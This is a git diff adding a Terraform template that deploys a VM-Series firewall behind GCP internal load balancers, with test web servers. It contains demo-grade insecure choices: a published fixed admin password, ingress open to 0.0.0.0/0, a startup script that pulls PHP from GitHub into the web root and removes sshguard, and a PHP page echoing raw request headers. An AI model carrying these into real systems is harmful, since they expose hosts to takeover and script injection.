+## MultiNic ILB Deployment
+This is a Terraform version of the manual build described at:
+https://cloud.google.com/load-balancing/docs/internal/setting-up-ilb-next-hop
+
+Terraform creates a VM-Series firewall that secures egress and east-west traffic for two internal VPCs. Egress traffic from the internal VPCs is routed to the VM-Series via an internal load balancer configured as the next hop (see the route sketch after the overview). The firewall is deployed in a Managed Instance Group to allow automatic failure detection and replacement.
+
+### Overview
+* 4 x VPCs (testing,management,production, production2)
+* 1 x VM-Series (BYOL / Bundle1 / Bundle2) in a Managed Instance Group
+* 1 x Ubuntu VM in the testing VPC (install Apache during creation)
+* 1 x Ubuntu VM in the production VPC (install Apache during creation)
+* 1 x GCP Internal Load Balancer in the testing VPC
+* 1 x GCP Internal Load Balancer in the production VPC
+* 1 x GCP Storage Bucket for VM-Series bootstrapping (random string appended to bucket name for global uniqueness)
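+
+The egress pattern here is a default route in each internal VPC whose next hop is the internal load balancer fronting the VM-Series. A minimal sketch of that pattern is shown below; the resource and network names are illustrative only (they are not the names used by this template), and depending on the provider version the `next_hop_ilb` argument may require the google-beta provider.
+
+```
+# Illustrative only: send all egress from an internal VPC to the ILB fronting the VM-Series.
+resource "google_compute_route" "egress_via_ilb" {
+  name         = "production-egress-via-ilb"
+  network      = google_compute_network.production.self_link
+  dest_range   = "0.0.0.0/0"
+  next_hop_ilb = google_compute_forwarding_rule.vmseries_ilb.self_link
+  priority     = 100
+}
+```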
+
+
+
+
+
+
+### Prerequisites
+1. Terraform
+2. Access to GCP Console
+
+After deployment, the firewalls' username and password are:
+ * **Username:** paloalto
+ * **Password:** Pal0Alt0@123
+
+### Deployment
+1. Download the **ilbnh-mig** repo to the machine running the build
+2. In an editor, open **terraform.tfvars** and set values for the following variables (an example follows the table):
+
+| Variable | Description |
+| :------------- | :------------- |
+| `project_id` | Project ID for the VM-Series, VM-Series VPCs, GCP storage bucket, & public load balancer. |
+| `public_key_path` | Public key used to authenticate to the firewall (username: admin) and the Ubuntu VMs (username: demo) |
+| `fw_panos` | The VM-Series license type and PAN-OS version to deploy |
+| `auth_file` | Authentication key file for deployment |
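+
+A minimal example of these values is shown below. Every value is a placeholder (the project ID, key path, license/PAN-OS string, and key file name are not real); use values valid for your own project and supported by this template.
+
+```
+project_id      = "my-gcp-project"
+public_key_path = "~/.ssh/gcp-demo.pub"
+fw_panos        = "bundle1-904"
+auth_file       = "gcp-credentials.json"
+```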
+
+3. Download the project authentication key files to the main directory of the Terraform build.
+
+
+
+
+4. Execute Terraform
+```
+$ terraform init
+$ terraform plan
+$ terraform apply
+```
+
+5. After the deployment finishes, navigate to the GCP console and note the public IP address associated with one of the Ubuntu servers.
+
+
+
+
+
+6. Connect to the server and issue a curl command to its peer (see the example below).
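+
+For example, from one of the Ubuntu VMs (the address below is a placeholder for the peer VM's internal IP):
+```
+$ curl http://<peer-vm-internal-ip>
+```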
+
+
+
+
+
+7. Log in to the firewall and review the traffic logs.
+
+
+
+
+8. Destroy the environment when done.
+```
+$ terraform destroy
+```
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/gcp/ilbnh-mig/bootstrap_files/authcodes b/gcp/ilbnh-mig/bootstrap_files/authcodes
new file mode 100644
index 00000000..0519ecba
--- /dev/null
+++ b/gcp/ilbnh-mig/bootstrap_files/authcodes
@@ -0,0 +1 @@
+
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/bootstrap_files/bootstrap.xml b/gcp/ilbnh-mig/bootstrap_files/bootstrap.xml
new file mode 100644
index 00000000..a354ec4f
--- /dev/null
+++ b/gcp/ilbnh-mig/bootstrap_files/bootstrap.xml
@@ -0,0 +1,1099 @@
+[bootstrap.xml content: the PAN-OS bootstrap configuration for the VM-Series firewalls. The XML markup was lost in extraction; recoverable settings include local admin accounts, the hostname "Multi-Nic-ILB", interfaces ethernet1/1-1/3 paired with loopback.1-3, path-monitored static routes for 10.30.1.0/24, 10.40.1.0/24, and 10.50.1.0/24 using Health-Check-Probe1/2 and the hc-tcp-22 probe, an interface management profile permitting the GCP health-check ranges 35.191.0.0/16 and 130.211.0.0/22, IKE/IPsec crypto profiles, Trust1/Trust2 zones with security rules allowing east-west traffic, vulnerability protection profiles, US/Pacific timezone with scheduled content updates from updates.paloaltonetworks.com, and the multi-nic-ilb / mgmt-interface-swap bootstrap options.]
diff --git a/gcp/ilbnh-mig/bootstrap_files/init-cfg.txt b/gcp/ilbnh-mig/bootstrap_files/init-cfg.txt
new file mode 100644
index 00000000..5b9c168b
--- /dev/null
+++ b/gcp/ilbnh-mig/bootstrap_files/init-cfg.txt
@@ -0,0 +1,10 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+hostname=packet-mirroring
+op-command-modes=mgmt-interface-swap
+dns-primary=
+dns-secondary=
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/fw_common.tf b/gcp/ilbnh-mig/fw_common.tf
new file mode 100644
index 00000000..aeaa685c
--- /dev/null
+++ b/gcp/ilbnh-mig/fw_common.tf
@@ -0,0 +1,106 @@
+#-----------------------------------------------------------------------------------------------
+# Create bootstrap bucket for firewalls
+module "bootstrap_common" {
+ source = "./modules/gcp_bootstrap/"
+ bucket_name = "fw-bootstrap-common"
+ file_location = "bootstrap_files/"
+ config = ["init-cfg.txt", "bootstrap.xml"]
+# config = ["init-cfg.txt"]
+ license = ["authcodes"]
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create firewall template
+#-----------------------------------------------------------------------------------------------
+module "fw_common" {
+ source = "./modules/vmseries/"
+ base_name = var.fw_base_name
+ region = var.region
+ target_size = var.target_size
+ zones = [
+ data.google_compute_zones.available.names[0],
+ data.google_compute_zones.available.names[1]
+ ]
+ networks = [
+ module.vpc0.network_self_link,
+ module.vpc1.network_self_link,
+ module.vpc2.network_self_link,
+ module.vpc3.network_self_link
+ ]
+ subnetworks = [
+ module.vpc0.subnetwork_self_link,
+ module.vpc1.subnetwork_self_link,
+ module.vpc2.subnetwork_self_link,
+ module.vpc3.subnetwork_self_link
+ ]
+ machine_type = var.fw_machine_type
+ bootstrap_bucket = module.bootstrap_common.bucket_name
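+  # Setting mgmt_interface_swap to "enable" swaps the interfaces at boot so nic0 (the interface GCP load balancing targets) becomes a dataplane interface and nic1 carries management traffic.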
+ mgmt_interface_swap = "enable"
+ ssh_key = fileexists(var.public_key_path) ? "admin:${file(var.public_key_path)}" : ""
+ image = "${var.fw_image}-${var.fw_panos}"
+ nic0_public_ip = false
+ nic1_public_ip = true
+ nic2_public_ip = false
+ nic3_public_ip = false
+ create_instance_group = true
+
+ dependencies = [
+ module.bootstrap_common.completion,
+ ]
+}
+
+resource "google_compute_health_check" "hc_ssh_22" {
+ name = "hc-ssh-22"
+
+ tcp_health_check {
+ port = var.health_check_port
+ }
+}
+
+module "ilb1" {
+ source = "./modules/ilbnh/"
+ name = "ilb1"
+ project_id = var.project_id
+ all_ports = true
+ ports = []
+ health_checks = [google_compute_health_check.hc_ssh_22.self_link]
+ region = var.region
+ network = module.vpc0.vpc_id
+ network_uri = module.vpc0.network_self_link
+ subnetwork = module.vpc0.subnetwork_self_link
+ ip_address = var.ilb1_ip
+ group = module.fw_common.vmseries_rigm
+}
+
+module "ilb2" {
+ source = "./modules/ilbnh/"
+ name = "ilb2"
+ project_id = var.project_id
+ all_ports = true
+ ports = []
+ health_checks = [google_compute_health_check.hc_ssh_22.self_link]
+ region = var.region
+ network = module.vpc2.vpc_id
+ network_uri = module.vpc2.network_self_link
+ subnetwork = module.vpc2.subnetwork_self_link
+ ip_address = var.ilb2_ip
+ group = module.fw_common.vmseries_rigm
+ }
+
+#-----------------------------------------------------------------------------------------------
+# Create routes that steer inter-VPC traffic to the internal load balancers as the next hop, and therefore through the VM-Series firewalls.
+resource "google_compute_route" "ilb_nhop_dest_10_30_1" {
+ name = "ilb-nhop-dest-10-30-1"
+ dest_range = "10.30.1.0/24"
+ network = module.vpc2.network_self_link
+ next_hop_ilb = module.ilb2.forwarding_rule
+ priority = 99
+}
+
+resource "google_compute_route" "ilb_nhop_dest_10_50_1" {
+ name = "ilb-nhop-dest-10-50-1"
+ dest_range = "10.50.1.0/24"
+ network = module.vpc0.network_self_link
+ next_hop_ilb = module.ilb1.forwarding_rule
+ priority = 99
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/fw_vpc.tf b/gcp/ilbnh-mig/fw_vpc.tf
new file mode 100644
index 00000000..230a66c0
--- /dev/null
+++ b/gcp/ilbnh-mig/fw_vpc.tf
@@ -0,0 +1,40 @@
+#-----------------------------------------------------------------------------------------------
+# Create firewall VPCs & subnets
+module "vpc0" {
+ source = "./modules/vpc/"
+ vpc = var.vpc0
+ subnet = var.vpc0_subnet
+ cidr = var.vpc0_cidr
+ region = var.region
+ allowed_sources = ["0.0.0.0/0"]
+}
+
+module "vpc1" {
+ source = "./modules/vpc/"
+ vpc = var.vpc1
+ subnet = var.vpc1_subnet
+ cidr = var.vpc1_cidr
+ region = var.region
+ allowed_sources = var.mgmt_sources
+ allowed_protocol = "TCP"
+ allowed_ports = ["443", "22"]
+}
+
+module "vpc2" {
+ source = "./modules/vpc/"
+ vpc = var.vpc2
+ subnet = var.vpc2_subnet
+ cidr = var.vpc2_cidr
+ region = var.region
+ allowed_sources = ["0.0.0.0/0"]
+}
+
+module "vpc3" {
+ source = "./modules/vpc/"
+ vpc = var.vpc3
+ subnet = var.vpc3_subnet
+ cidr = var.vpc3_cidr
+ region = var.region
+ allowed_sources = ["0.0.0.0/0"]
+ delete_default_route = true
+}
diff --git a/gcp/ilbnh-mig/images/curl.png b/gcp/ilbnh-mig/images/curl.png
new file mode 100644
index 00000000..e17b875c
Binary files /dev/null and b/gcp/ilbnh-mig/images/curl.png differ
diff --git a/gcp/ilbnh-mig/images/deployment.png b/gcp/ilbnh-mig/images/deployment.png
new file mode 100644
index 00000000..636f95d1
Binary files /dev/null and b/gcp/ilbnh-mig/images/deployment.png differ
diff --git a/gcp/ilbnh-mig/images/diagram.svg b/gcp/ilbnh-mig/images/diagram.svg
new file mode 100644
index 00000000..d68679f4
--- /dev/null
+++ b/gcp/ilbnh-mig/images/diagram.svg
@@ -0,0 +1,805 @@
+[diagram.svg: topology diagram for the deployment; SVG content not preserved.]
diff --git a/gcp/ilbnh-mig/images/directory.png b/gcp/ilbnh-mig/images/directory.png
new file mode 100644
index 00000000..8317ff94
Binary files /dev/null and b/gcp/ilbnh-mig/images/directory.png differ
diff --git a/gcp/ilbnh-mig/images/fwlogs.png b/gcp/ilbnh-mig/images/fwlogs.png
new file mode 100644
index 00000000..52ea690c
Binary files /dev/null and b/gcp/ilbnh-mig/images/fwlogs.png differ
diff --git a/gcp/ilbnh-mig/modules/gcp_bootstrap/main.tf b/gcp/ilbnh-mig/modules/gcp_bootstrap/main.tf
new file mode 100644
index 00000000..a93e7956
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/gcp_bootstrap/main.tf
@@ -0,0 +1,85 @@
+locals {
+ bucket_name = join("", [var.bucket_name, random_string.randomstring.result])
+}
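+# Append a random suffix so the bootstrap bucket name is globally unique.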
+resource "random_string" "randomstring" {
+ length = 25
+ min_lower = 15
+ min_numeric = 10
+ special = false
+}
+
+resource "google_storage_bucket" "bootstrap" {
+ name = local.bucket_name
+ force_destroy = true
+}
+
+resource "google_storage_bucket_object" "config_full" {
+ count = length(var.config) > 0 ? length(var.config) : "0"
+ name = "config/${element(var.config, count.index)}"
+ source = "${var.file_location}${element(var.config, count.index)}"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "content_full" {
+ count = length(var.content) > 0 ? length(var.content) : "0"
+ name = "content/${element(var.content, count.index)}"
+ source = "${var.file_location}${element(var.content, count.index)}"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "license_full" {
+ count = length(var.license) > 0 ? length(var.license) : "0"
+ name = "license/${element(var.license, count.index)}"
+ source = "${var.file_location}${element(var.license, count.index)}"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "software_full" {
+ count = length(var.software) > 0 ? length(var.software) : "0"
+ name = "software/${element(var.software, count.index)}"
+ source = "${var.file_location}${element(var.software, count.index)}"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
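+# When a folder list is empty, upload a placeholder object so the bucket still presents the config/, content/, license/, and software/ structure the VM-Series bootstrap process expects.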
+resource "google_storage_bucket_object" "config_empty" {
+ count = length(var.config) == 0 ? 1 : 0
+ name = "config/"
+ content = "config/"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "content_empty" {
+ count = length(var.content) == 0 ? 1 : 0
+ name = "content/"
+ content = "content/"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "license_empty" {
+ count = length(var.license) == 0 ? 1 : 0
+ name = "license/"
+ content = "license/"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "software_empty" {
+ count = length(var.software) == 0 ? 1 : 0
+ name = "software/"
+ content = "software/"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
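+# Single aggregation point for all bucket objects; its id is exported as the "completion" output so other modules can wait for the bootstrap upload to finish.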
+resource "null_resource" "dependency_setter" {
+ depends_on = [
+ google_storage_bucket.bootstrap,
+ google_storage_bucket_object.config_full,
+ google_storage_bucket_object.content_full,
+ google_storage_bucket_object.license_full,
+ google_storage_bucket_object.software_full,
+ google_storage_bucket_object.config_empty,
+ google_storage_bucket_object.content_empty,
+ google_storage_bucket_object.license_empty,
+ google_storage_bucket_object.software_empty,
+ ]
+}
+
diff --git a/gcp/ilbnh-mig/modules/gcp_bootstrap/outputs.tf b/gcp/ilbnh-mig/modules/gcp_bootstrap/outputs.tf
new file mode 100644
index 00000000..ef7f162d
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/gcp_bootstrap/outputs.tf
@@ -0,0 +1,8 @@
+output completion {
+ value = null_resource.dependency_setter.id
+}
+
+output bucket_name {
+ value = google_storage_bucket.bootstrap.name
+}
+
diff --git a/gcp/ilbnh-mig/modules/gcp_bootstrap/variables.tf b/gcp/ilbnh-mig/modules/gcp_bootstrap/variables.tf
new file mode 100644
index 00000000..0db2b8fd
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/gcp_bootstrap/variables.tf
@@ -0,0 +1,24 @@
+variable bucket_name {
+}
+
+variable file_location {
+}
+
+variable config {
+ type = list(string)
+ default = []
+}
+
+variable content {
+ type = list(string)
+ default = []
+}
+
+variable license {
+ type = list(string)
+ default = []
+}
+
+variable software {
+ default = []
+}
diff --git a/gcp/ilbnh-mig/modules/ilbnh/main.tf b/gcp/ilbnh-mig/modules/ilbnh/main.tf
new file mode 100644
index 00000000..e3491df0
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/ilbnh/main.tf
@@ -0,0 +1,27 @@
+#-----------------------------------------------------------------------------------------------
+# Create the internal load balancers, one for the testing network and one for the production network.
+# The regional backend service fronts the VM-Series managed instance group; the forwarding rule below (with all_ports enabled) lets the ILB be used as a route next hop.
+resource "google_compute_region_backend_service" "default" {
+ provider = "google-beta"
+ name = var.name
+ project = var.project_id
+ load_balancing_scheme = "INTERNAL"
+ health_checks = var.health_checks
+ region = var.region
+ network = var.network_uri
+
+ backend {
+ group = var.group
+ }
+}
+
+resource "google_compute_forwarding_rule" "default" {
+ name = "fr-${var.name}"
+ region = var.region
+ load_balancing_scheme = "INTERNAL"
+ backend_service = google_compute_region_backend_service.default.id
+ all_ports = var.all_ports
+ network = var.network
+ subnetwork = var.subnetwork
+ ip_address = var.ip_address
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/modules/ilbnh/outputs.tf b/gcp/ilbnh-mig/modules/ilbnh/outputs.tf
new file mode 100644
index 00000000..d99cc408
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/ilbnh/outputs.tf
@@ -0,0 +1,3 @@
+output forwarding_rule {
+ value = google_compute_forwarding_rule.default.self_link
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/modules/ilbnh/variables.tf b/gcp/ilbnh-mig/modules/ilbnh/variables.tf
new file mode 100644
index 00000000..585f8276
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/ilbnh/variables.tf
@@ -0,0 +1,41 @@
+variable project_id {
+}
+
+variable region {
+}
+
+variable name {
+}
+
+variable health_checks {
+ type = list(string)
+ default = []
+}
+
+variable group {
+}
+
+variable subnetwork {
+}
+
+variable ip_address {
+ default = null
+}
+
+variable ip_protocol {
+ default = "TCP"
+}
+variable all_ports {
+ type = bool
+}
+variable ports {
+ type = list(string)
+ default = []
+}
+
+variable network {
+ default = null
+}
+
+variable network_uri {
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/modules/vm/main.tf b/gcp/ilbnh-mig/modules/vm/main.tf
new file mode 100644
index 00000000..fff23b2e
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/vm/main.tf
@@ -0,0 +1,34 @@
+resource "google_compute_instance" "default" {
+ count = length(var.names)
+ name = element(var.names, count.index)
+ machine_type = var.machine_type
+ zone = element(var.zones, count.index)
+ can_ip_forward = false
+ allow_stopping_for_update = true
+ metadata_startup_script = var.startup_script
+
+ metadata = {
+ serial-port-enable = true
+ ssh-keys = var.ssh_key
+ }
+
+ network_interface {
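+    # Request an ephemeral public IP only when server_public_ip is true (an empty access_config block allocates one).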
+ dynamic "access_config" {
+ for_each = var.server_public_ip ? [""] : []
+ content {}
+ }
+ subnetwork = element(var.subnetworks, count.index)
+ network_ip = element(var.server_ips, count.index)
+
+ }
+
+ boot_disk {
+ initialize_params {
+ image = var.image
+ }
+ }
+
+ service_account {
+ scopes = var.scopes
+ }
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/modules/vm/outputs.tf b/gcp/ilbnh-mig/modules/vm/outputs.tf
new file mode 100644
index 00000000..75856670
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/vm/outputs.tf
@@ -0,0 +1,7 @@
+output vm_names {
+ value = google_compute_instance.default.*.name
+}
+
+output vm_self_link {
+ value = google_compute_instance.default.*.self_link
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/modules/vm/variables.tf b/gcp/ilbnh-mig/modules/vm/variables.tf
new file mode 100644
index 00000000..76b51bf5
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/vm/variables.tf
@@ -0,0 +1,44 @@
+variable names {
+ type = list(string)
+}
+
+variable machine_type {
+}
+
+variable zones {
+ type = list(string)
+}
+variable ssh_key {
+ default = ""
+}
+variable image {
+}
+
+variable subnetworks {
+ type = list(string)
+}
+
+variable server_ips {
+ type = list(string)
+}
+
+variable scopes {
+ type = list(string)
+
+ default = [
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+}
+
+variable startup_script {
+ default = ""
+}
+
+variable server_public_ip {
+ type = bool
+ default = false
+}
+
diff --git a/gcp/ilbnh-mig/modules/vmseries/main.tf b/gcp/ilbnh-mig/modules/vmseries/main.tf
new file mode 100644
index 00000000..0b78dd00
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/vmseries/main.tf
@@ -0,0 +1,84 @@
+resource "google_compute_instance_template" "vmseries" {
+ name = "vmseries-template"
+ description = "This template is used to create firewall instances."
+ instance_description = "VM-Series for ILBNH"
+ region = var.region
+ machine_type = var.machine_type
+ min_cpu_platform = var.cpu_platform
+ can_ip_forward = true
+ tags = var.tags
+
+ scheduling {
+ automatic_restart = true
+ on_host_maintenance = "MIGRATE"
+ }
+
+ metadata = {
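+    # Bootstrap metadata: the VM-Series pulls init-cfg.txt and bootstrap.xml from this GCS bucket at first boot.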
+ mgmt-interface-swap = var.mgmt_interface_swap
+ vmseries-bootstrap-gce-storagebucket = var.bootstrap_bucket
+ serial-port-enable = true
+ ssh-keys = var.ssh_key
+ }
+
+ service_account {
+ scopes = var.scopes
+ }
+
+ network_interface {
+
+ dynamic "access_config" {
+ for_each = var.nic0_public_ip ? [""] : []
+ content {}
+ }
+ subnetwork = var.subnetworks[0]
+ }
+
+ network_interface {
+ dynamic "access_config" {
+ for_each = var.nic1_public_ip ? [""] : []
+ content {}
+ }
+ subnetwork = var.subnetworks[1]
+ }
+
+ network_interface {
+ dynamic "access_config" {
+ for_each = var.nic2_public_ip ? [""] : []
+ content {}
+ }
+ subnetwork = var.subnetworks[2]
+ }
+
+ network_interface {
+ dynamic "access_config" {
+ for_each = var.nic3_public_ip ? [""] : []
+ content {}
+ }
+ subnetwork = var.subnetworks[3]
+ }
+
+ disk {
+ source_image = var.image
+ type = var.disk_type
+ }
+
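+  # An instance template referenced by a MIG cannot be deleted in place, so replacements must be created before the old template is destroyed.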
+ lifecycle {
+ create_before_destroy = "true"
+ }
+}
+
+resource "google_compute_region_instance_group_manager" "vmseries_rigm" {
+ name = "vmseries-rigm"
+ base_instance_name = var.base_name
+ region = var.region
+ target_size = var.target_size
+
+ version {
+ instance_template = google_compute_instance_template.vmseries.self_link
+ }
+
+ named_port {
+ name = "http"
+ port = "80"
+ }
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/modules/vmseries/outputs.tf b/gcp/ilbnh-mig/modules/vmseries/outputs.tf
new file mode 100644
index 00000000..11bd3b53
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/vmseries/outputs.tf
@@ -0,0 +1,3 @@
+output vmseries_rigm {
+ value = google_compute_region_instance_group_manager.vmseries_rigm.instance_group
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/modules/vmseries/variables.tf b/gcp/ilbnh-mig/modules/vmseries/variables.tf
new file mode 100644
index 00000000..271a7b55
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/vmseries/variables.tf
@@ -0,0 +1,121 @@
+variable networks {
+ type = list(string)
+}
+
+variable subnetworks {
+ type = list(string)
+}
+
+variable base_name {
+}
+
+variable machine_type {
+}
+
+variable region {
+}
+
+variable zones {
+ type = list(string)
+}
+
+variable cpu_platform {
+ default = "Intel Broadwell"
+}
+variable disk_type {
+ default = "pd-ssd"
+}
+variable bootstrap_bucket {
+ default = ""
+}
+
+variable ssh_key {
+ default = ""
+}
+
+variable public_lb_create {
+ default = false
+}
+
+variable target_size {
+ default = "1"
+}
+
+variable scopes {
+ type = list(string)
+
+ default = [
+ "https://www.googleapis.com/auth/compute.readonly",
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+}
+
+variable image {
+}
+
+variable tags {
+ type = list(string)
+ default = []
+}
+
+variable create_instance_group {
+ type = bool
+ default = false
+}
+
+variable instance_group_names {
+ type = list(string)
+ default = ["vmseries-instance-group"]
+}
+
+variable dependencies {
+ type = list(string)
+ default = []
+}
+
+variable mgmt_interface_swap {
+ default = ""
+}
+
+variable nic0_ip {
+ type = list(string)
+ default = [""]
+}
+
+variable nic1_ip {
+ type = list(string)
+ default = [""]
+}
+
+variable nic2_ip {
+ type = list(string)
+ default = [""]
+}
+
+variable nic3_ip {
+ type = list(string)
+ default = [""]
+}
+
+variable nic0_public_ip {
+ type = bool
+ default = false
+}
+
+variable nic1_public_ip {
+ type = bool
+ default = false
+}
+
+variable nic2_public_ip {
+ type = bool
+ default = false
+}
+
+variable nic3_public_ip {
+ type = bool
+ default = false
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/modules/vpc/main.tf b/gcp/ilbnh-mig/modules/vpc/main.tf
new file mode 100644
index 00000000..6c681d08
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/vpc/main.tf
@@ -0,0 +1,25 @@
+resource "google_compute_network" "default" {
+ name = var.vpc
+ delete_default_routes_on_create = var.delete_default_route
+ auto_create_subnetworks = false
+}
+
+resource "google_compute_subnetwork" "default" {
+ name = var.subnet
+ ip_cidr_range = var.cidr
+ region = var.region
+ network = google_compute_network.default.self_link
+}
+
+resource "google_compute_firewall" "default" {
+ count = length(var.allowed_sources) != 0 ? 1 : 0
+ name = "${google_compute_network.default.name}-ingress"
+ network = google_compute_network.default.self_link
+ direction = "INGRESS"
+ source_ranges = var.allowed_sources
+
+ allow {
+ protocol = var.allowed_protocol
+ ports = var.allowed_ports
+ }
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/modules/vpc/outputs.tf b/gcp/ilbnh-mig/modules/vpc/outputs.tf
new file mode 100644
index 00000000..dbf7ed78
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/vpc/outputs.tf
@@ -0,0 +1,29 @@
+output network_self_link {
+# value = google_compute_network.default.*.self_link
+ value = google_compute_network.default.self_link
+}
+
+output subnetwork_id {
+ value = google_compute_subnetwork.default.*.id
+}
+
+output subnetwork_name {
+ value = google_compute_subnetwork.default.*.name
+}
+
+output subnetwork_self_link {
+# value = google_compute_subnetwork.default.*.self_link
+ value = google_compute_subnetwork.default.self_link
+}
+
+output vpc_name {
+ value = google_compute_network.default.*.name
+}
+
+output vpc_id {
+ value = google_compute_network.default.*.id[0]
+}
+
+output vpc_self_link {
+ value = google_compute_network.default.*.self_link[0]
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/modules/vpc/variables.tf b/gcp/ilbnh-mig/modules/vpc/variables.tf
new file mode 100644
index 00000000..04407a0d
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/vpc/variables.tf
@@ -0,0 +1,29 @@
+variable vpc {
+}
+
+variable subnet {
+}
+
+variable cidr {
+}
+
+variable region {
+}
+
+variable allowed_sources {
+ type = list(string)
+ default = []
+}
+
+variable allowed_protocol {
+ default = "all"
+}
+
+variable allowed_ports {
+ type = list(string)
+ default = []
+}
+
+variable delete_default_route {
+ default = "false"
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/project.tf b/gcp/ilbnh-mig/project.tf
new file mode 100644
index 00000000..a65b533f
--- /dev/null
+++ b/gcp/ilbnh-mig/project.tf
@@ -0,0 +1,15 @@
+terraform {
+ required_version = ">= 0.12"
+}
+
+provider "google" {
+ credentials = var.auth_file
+ project = var.project_id
+ region = var.region
+}
+
+provider "google-beta" {
+ version = "> 2.50.0"
+}
+
+data "google_compute_zones" "available" {}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/scripts/showheaders.php b/gcp/ilbnh-mig/scripts/showheaders.php
new file mode 100644
index 00000000..19c37318
--- /dev/null
+++ b/gcp/ilbnh-mig/scripts/showheaders.php
@@ -0,0 +1,62 @@
+<?php
+/* Return the client address as seen by the web server, preferring proxy headers when present */
+function getRealIpAddr()
+{
+    if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
+        $ip = $_SERVER['HTTP_CLIENT_IP'];
+    } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
+    } else {
+        $ip = $_SERVER['REMOTE_ADDR'];
+    }
+    return $ip;
+}
+
+$time = date('Y-m-d H:i:s');
+
+echo '<h2>SOURCE & DESTINATION ADDRESSES</h2>';
+echo '<b>INTERVAL</b>: '. $time .'<br>';
+$localIPAddress = getHostByName(getHostName());
+$sourceIPAddress = getRealIpAddr();
+echo '<b>SOURCE IP</b>: '. $sourceIPAddress .'<br>';
+echo '<b>LOCAL IP</b>: '. $localIPAddress .'<br>';
+
+$vm_name = gethostname();
+echo '<b>VM NAME</b>: '. $vm_name .'<br>';
+echo '<br>';
+echo '<h2>HEADER INFORMATION</h2>';
+/* All $_SERVER variables prefixed with HTTP_ are the HTTP headers */
+foreach ($_SERVER as $header => $value) {
+    if (substr($header, 0, 5) == 'HTTP_') {
+        /* Strip the HTTP_ prefix from the $_SERVER variable, what remains is the header */
+        $clean_header = strtolower(substr($header, 5, strlen($header)));
+
+        /* Replace underscores with the dashes the browser sends */
+        $clean_header = str_replace('_', '-', $clean_header);
+
+        /* Cleanup: standard headers are first-letter uppercase */
+        $clean_header = ucwords($clean_header, " \t\r\n\f\v-");
+
+        /* And show them */
+        echo '<b>'. $clean_header .'</b>: '. $value .'<br>';
+    }
+}
+?>
diff --git a/gcp/ilbnh-mig/scripts/webserver-startup.sh b/gcp/ilbnh-mig/scripts/webserver-startup.sh
new file mode 100644
index 00000000..a19aefe9
--- /dev/null
+++ b/gcp/ilbnh-mig/scripts/webserver-startup.sh
@@ -0,0 +1,9 @@
+#!/bin/bash
+until sudo apt-get update; do echo "Retrying"; sleep 2; done
+until sudo apt-get install -y php; do echo "Retrying"; sleep 2; done
+until sudo apt-get install -y apache2; do echo "Retrying"; sleep 2; done
+until sudo apt-get install -y libapache2-mod-php; do echo "Retrying"; sleep 2; done
+until sudo rm -f /var/www/html/index.html; do echo "Retrying"; sleep 2; done
+until sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_4fw_2spoke/scripts/showheaders.php; do echo "Retrying"; sleep 2; done
+until sudo systemctl restart apache2; do echo "Retrying"; sleep 2; done
+until sudo apt-get autoremove -y --purge sshguard; do echo "Retrying"; sleep 2; done
\ No newline at end of file
